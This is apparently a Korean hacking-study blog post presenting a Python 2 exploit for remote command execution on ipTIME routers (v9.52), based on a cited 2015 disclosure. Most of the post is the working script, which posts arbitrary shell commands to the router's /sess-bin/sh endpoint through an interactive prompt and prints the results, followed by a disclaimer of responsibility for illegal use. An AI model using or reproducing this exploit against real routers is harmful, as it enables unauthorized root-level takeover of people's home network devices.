본문 바로가기

Hacking Study/Pwnable

ipTIME 공유기 v9.52 Exploit Code

해당 취약점의 출처
http://pierrekim.github.io/blog/2015-07-01-poc-with-RCE-against-127-iptime-router-models.html


취약점 Exploit 코드가 동작하지 않아 파이썬으로 개발하였습니다.

#-*- coding: utf-8 -*-
import urllib, urllib2


def attack():
   global e
   url="http://192.168.0.1/sess-bin/sh"
   payload = "X=X; echo 'Content-type: text/plain';echo;"
   command=raw_input("root@192.168.0.1:/bin# ")
   if(command == "exit"):
      e=1
   payload += command+";"
   req=urllib2.Request(url,payload)
   req.add_header("User-Agent","Mozilla/5.0")
   req.add_header("Content-type","text/plain")
   read=urllib2.urlopen(req).read()
   print read
   
while(1):
   try:
      attack()
      if(e==1):
         print("Bye")
         break
   except:
      0



코드 실행 화면

[*] 해당 코드를 불법적으로 사용시 책임을 지지 않습니다.